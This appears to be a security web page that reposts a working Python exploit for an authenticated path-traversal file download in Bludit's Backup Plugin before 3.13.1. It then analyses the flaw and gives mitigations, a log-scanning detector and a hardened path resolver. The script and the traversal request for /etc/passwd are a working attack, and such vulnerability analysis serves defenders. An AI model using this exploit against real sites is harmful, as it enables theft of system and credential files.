Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)

Exploit Author: Antonio Cuomo
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: Python
Published Date: 2023-06-23
#!/usr/bin/env python3
# -*- coding: utf-8 -*-

# Exploit Title: Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated)
# Date: 2022-07-21
# Exploit Author: Antonio Cuomo (arkantolo)
# Vendor Homepage: https://www.bludit.com
# Software Link: https://github.com/bludit/bludit
# Version: < 3.13.1
# Tested on: Debian 10 - PHP Version: 7.3.14

import sys
import argparse
import requests
from bs4 import BeautifulSoup  # pip3 install beautifulsoup4


def main():
    parser = argparse.ArgumentParser(description='Bludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)')
    parser.add_argument('-x', '--url', type=str, required=True, help='base URL of the Bludit instance')
    parser.add_argument('-u', '--user', type=str, required=True, help='username of a valid account')
    parser.add_argument('-p', '--password', type=str, required=True, help='password of that account')
    parser.add_argument('-f', '--file', type=str, required=True, help='file to read, relative to the filesystem root (e.g. etc/passwd)')
    args = parser.parse_args()
    print("\nBludit < 3.13.1 - Backup Plugin - Arbitrary File Download (Authenticated)", "\nExploit Author: Antonio Cuomo (Arkantolo)\n")
    exploit(args)


def exploit(args):
    s2 = requests.Session()

    url = args.url.rstrip("/")

    # get the CSRF token embedded in the admin login form
    r = s2.get(url + '/admin/')
    soup = BeautifulSoup(r.text, 'html.parser')
    formtoken = soup.find('input', {'name': 'tokenCSRF'})['value']

    # login: a successful login answers with a 301 to the dashboard
    body = {'tokenCSRF': formtoken, 'username': args.user, 'password': args.password}
    r = s2.post(url + '/admin/', data=body, allow_redirects=False)
    if r.status_code == 301 and r.headers.get('location', '').find('/admin/dashboard') != -1:
        print("[*] Login OK")
    else:
        print("[*] Login Failed")
        sys.exit(1)

    # arbitrary download: the backup plugin passes the file parameter to the filesystem unchecked
    r = s2.get(url + '/plugin-backup-download?file=../../../../../../../../' + args.file)
    if r.status_code == 200 and len(r.content) > 0:
        print("[*] File:")
        print(r.text)
    else:
        print("[*] Exploit Failed")
        sys.exit(1)


if __name__ == '__main__':
    main()


Bludit < 3.13.1 Backup Plugin - Arbitrary File Download (Authenticated) Vulnerability Analysis

Bludit, a lightweight open-source content management system (CMS), has long been praised for its simplicity and ease of deployment. However, versions prior to 3.13.1 contain a critical security flaw in the Backup Plugin that enables authenticated attackers to perform arbitrary file downloads. This vulnerability, discovered by Antonio Cuomo (arkantolo) in July 2022, highlights how seemingly benign features can become gateways for serious exploitation.

Understanding the Vulnerability

The core issue lies in the /plugin-backup-download endpoint, which allows authenticated users to download backup files. While intended for legitimate backup operations, the plugin fails to properly sanitize the file parameter passed in the GET request. An attacker can manipulate this parameter to traverse the filesystem using ../../../../../../../../ sequences, effectively bypassing directory restrictions and accessing sensitive files.

For example, an attacker could request:

GET /plugin-backup-download?file=../../../../../../../../etc/passwd

Without proper input validation, the server returns the contents of /etc/passwd, a file containing system user information. This demonstrates how a single unsanitized parameter in a plugin can expose critical system data.

Exploitation Workflow

The exploit requires authentication, meaning the attacker must first gain access to an admin account. The process involves three stages:

  • CSRF Token Acquisition: The attacker retrieves the CSRF token from the login page so that the subsequent login request passes the form's anti-CSRF check.
  • Authentication: Using the token, the attacker logs in with valid credentials.
  • Arbitrary File Download: After login, the attacker sends a crafted request to the backup plugin endpoint with a path traversal payload.

Real-World Impact and Use Cases

This vulnerability is particularly dangerous in environments where:

  • Bludit is used for hosting sensitive content (e.g., internal documentation).
  • Administrators reuse passwords across multiple systems.
  • File systems contain configuration files with hardcoded credentials.

For instance, an attacker could retrieve config.php or database.php files to extract database connection details, enabling further attacks such as SQL injection or database exfiltration.

Code Example and Exploit Analysis

The Python script reproduced at the top of this page (the exploit-db entry by Antonio Cuomo) demonstrates the exploit.

Explanation: This script automates the exploitation process. It first retrieves the CSRF token from the login page using BeautifulSoup to parse HTML. It then performs a POST request to authenticate the user. Finally, it sends a GET request with a path traversal payload to download arbitrary files. The exploit succeeds only if the server returns a 200 status code and non-empty content.

Security Recommendations

To mitigate this vulnerability, developers and administrators should:

  • Update Bludit to version 3.13.1 or later, where the patch has been implemented.
  • Implement strict input validation on all file path parameters, especially in plugins.
  • Use whitelisting instead of blacklisting for file paths — only allow predefined directories.
  • Enforce role-based access control to limit backup functionality to trusted users.
  • Monitor logs for suspicious requests containing path traversal patterns.
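The last recommendation above, monitoring logs for traversal patterns, is the one a defender can act on without touching the application. The following Python block is an added example, not part of the original exploit or of Bludit, that scans web-server access logs in the common "combined" format for requests to the /plugin-backup-download endpoint whose file parameter contains a ../ sequence, decoding single and double percent-encoding first so that %2e%2e%2f and %252e%252e%252f are caught as well. The log lines embedded in it are constructed for the example; the endpoint and parameter names come from the exploit, everything else (IP addresses, timestamps, sizes) is made up.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed sample access log in Apache/nginx "combined" format (not real traffic).
# 203.0.113.7 behaves like the exploit script; 198.51.100.4 is a legitimate admin.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Jul/2022:10:14:02 +0000] "GET /admin/ HTTP/1.1" 200 4211 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Jul/2022:10:14:05 +0000] "POST /admin/ HTTP/1.1" 301 0 "-" "python-requests/2.28.1"
203.0.113.7 - - [21/Jul/2022:10:14:06 +0000] "GET /plugin-backup-download?file=../../../../../../../../etc/passwd HTTP/1.1" 200 1834 "-" "python-requests/2.28.1"
198.51.100.4 - - [21/Jul/2022:10:20:41 +0000] "GET /plugin-backup-download?file=backup-2022-07-20.zip HTTP/1.1" 200 93810 "-" "Mozilla/5.0"
198.51.100.4 - - [21/Jul/2022:10:20:55 +0000] "GET /plugin-backup-download?file=notes..old.zip HTTP/1.1" 404 0 "-" "Mozilla/5.0"
203.0.113.7 - - [21/Jul/2022:10:21:13 +0000] "GET /plugin-backup-download?file=%2e%2e%2f%2e%2e%2fconfig.php HTTP/1.1" 200 612 "-" "python-requests/2.28.1"
203.0.113.7 - - [21/Jul/2022:10:22:00 +0000] "GET /plugin-backup-download?file=%252e%252e%252fconfig.php HTTP/1.1" 200 0 "-" "python-requests/2.28.1"
"""

# Fields of the combined log format we need: client, timestamp, request target, status, size.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)'
)

# A ".." that forms a whole path segment (start or separator before, separator or end after).
# "notes..old.zip" is therefore not flagged, "../x" and "x/../y" are.
TRAVERSAL_RE = re.compile(r'(^|[\\/])\.\.([\\/]|$)')


def decode_fully(value, max_rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded traversal is normalised."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def is_traversal(value):
    return bool(TRAVERSAL_RE.search(decode_fully(value)))


def find_traversal_requests(log_text, endpoint='/plugin-backup-download', param='file'):
    """Return one finding per request to `endpoint` whose `param` contains a traversal."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or foreign line, skip it
        parts = urlsplit(m.group('target'))
        if parts.path != endpoint:
            continue
        # parse_qs performs one round of percent-decoding; decode_fully handles the rest
        for raw in parse_qs(parts.query, keep_blank_values=True).get(param, []):
            if not is_traversal(raw):
                continue
            status = int(m.group('status'))
            size = 0 if m.group('size') == '-' else int(m.group('size'))
            findings.append({
                'ip': m.group('ip'),
                'ts': m.group('ts'),
                'file': decode_fully(raw),
                'status': status,
                # the exploit only counts a 200 with a body as success; mirror that here
                'served': status == 200 and size > 0,
            })
    return findings


def summarize_by_client(findings):
    """Count attempts and successful downloads per client address."""
    summary = {}
    for f in findings:
        entry = summary.setdefault(f['ip'], {'attempts': 0, 'served': 0})
        entry['attempts'] += 1
        if f['served']:
            entry['served'] += 1
    return summary


if __name__ == '__main__':
    hits = find_traversal_requests(SAMPLE_LOG)
    for h in hits:
        print(f"{h['ts']} {h['ip']} file={h['file']!r} status={h['status']} served={h['served']}")
    print(summarize_by_client(hits))
```

The `served` flag is what distinguishes a probe from a leak: a 200 with a non-empty body on a traversal request means a file left the server, which is the condition the exploit itself tests for, and is the signal to treat as an incident rather than noise.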

Technical Insight: Why Path Traversal Works

Path traversal attacks rely on the fact that many web servers and applications do not canonicalize user-supplied file paths before using them. The ../../../../ sequence allows an attacker to move up through directory levels, potentially reaching the filesystem root. The lack of proper sanitization in Bludit's backup plugin means that the application treats user input as a literal file path without checking that the resolved path still lies inside the intended directory.

This is a classic example of a path traversal vulnerability: a common issue in web applications that can lead to data leakage, privilege escalation, or even remote code execution if combined with other flaws.
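To make concrete both the unsanitized file parameter described under "Understanding the Vulnerability" and the canonicalization point made just above, the following Python block is an added example (not Bludit's PHP code and not part of the exploit entry) that places the flawed pattern beside a hardened version. The flawed function glues the request value onto the backup directory, so the operating system resolves the .. segments when the file is opened. The hardened function fully percent-decodes the value, allow-lists the shape of a backup filename, and then checks that the realpath-resolved candidate is still inside the realpath-resolved backup directory, which also rejects symlinks inside the backup folder that point elsewhere. The directory path, filename pattern and the files created in the demo are all assumptions made for the example.

```python
import os
import re
import tempfile
from urllib.parse import unquote

# Hypothetical allow-list for archive names: letters, digits, '_', '.', '-', ending in .zip.
# No separators can appear, so '../' can never pass. (Assumption for the example.)
BACKUP_NAME_RE = re.compile(r'[A-Za-z0-9][A-Za-z0-9_.-]*\.zip')


def vulnerable_backup_path(backup_dir, requested):
    """The flawed pattern: request value appended to the directory with no checks.
    '../secret.txt' yields '<backup_dir>/../secret.txt', which the OS resolves
    to a file outside backup_dir when opened."""
    return backup_dir + '/' + requested


def fully_decoded(value, rounds=3):
    """Bounded repeated percent-decoding so %252e%252e%252f is seen as '../'."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    return value


def safe_backup_path(backup_dir, requested):
    """Hardened resolution: decode, allow-list the name, then enforce containment."""
    name = fully_decoded(requested)
    # 1. allow-list: only a plain archive filename is acceptable
    if not BACKUP_NAME_RE.fullmatch(name):
        raise ValueError('file name not permitted: %r' % requested)
    # 2. containment: after '..' and symlink resolution the path must stay under base
    base = os.path.realpath(backup_dir)
    candidate = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, candidate]) != base:
        raise ValueError('path escapes backup directory: %r' % requested)
    return candidate


def is_allowed(backup_dir, requested):
    """True if the hardened resolver would serve `requested` from `backup_dir`."""
    try:
        safe_backup_path(backup_dir, requested)
        return True
    except ValueError:
        return False


def demo():
    """Build a throwaway tree and show what each resolver does with a traversal value."""
    with tempfile.TemporaryDirectory() as root:
        backup_dir = os.path.join(root, 'backup')
        os.mkdir(backup_dir)
        with open(os.path.join(backup_dir, 'site-2022-07-20.zip'), 'wb') as fh:
            fh.write(b'PK\x05\x06' + b'\x00' * 18)  # empty zip, constructed
        secret = os.path.join(root, 'secret.txt')  # stands in for a config file outside the backup dir
        with open(secret, 'w') as fh:
            fh.write('db_password=example')

        results = {}
        # the flawed resolver happily reads the file one level up
        with open(vulnerable_backup_path(backup_dir, '../secret.txt')) as fh:
            results['vulnerable'] = fh.read()
        # the hardened resolver refuses the same value
        results['hardened'] = 'allowed' if is_allowed(backup_dir, '../secret.txt') else 'rejected'
        # a legitimate archive name still works
        results['legitimate'] = os.path.basename(safe_backup_path(backup_dir, 'site-2022-07-20.zip'))
        # a symlink inside the backup dir pointing outside is caught by the realpath check
        try:
            os.symlink(secret, os.path.join(backup_dir, 'link.zip'))
            results['symlink'] = 'allowed' if is_allowed(backup_dir, 'link.zip') else 'rejected'
        except OSError:
            results['symlink'] = 'skipped'  # platform does not allow creating symlinks
        return results


if __name__ == '__main__':
    for key, value in demo().items():
        print(f'{key}: {value}')
```

The order of the two checks matters: the allow-list gives a clear, cheap rejection for anything that is not a backup archive name, while the realpath containment check is the backstop that holds even if the allow-list is later loosened, because it judges the path the operating system will actually open rather than the string the client sent.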

Conclusion

While Bludit is designed for simplicity, this vulnerability underscores the importance of security-by-design. Even small plugins can introduce significant risks if not rigorously tested. Developers must prioritize input validation, access control, and regular updates. For administrators, this exploit serves as a reminder to never assume that a CMS is inherently secure — always verify versions, patch vulnerabilities, and monitor access patterns.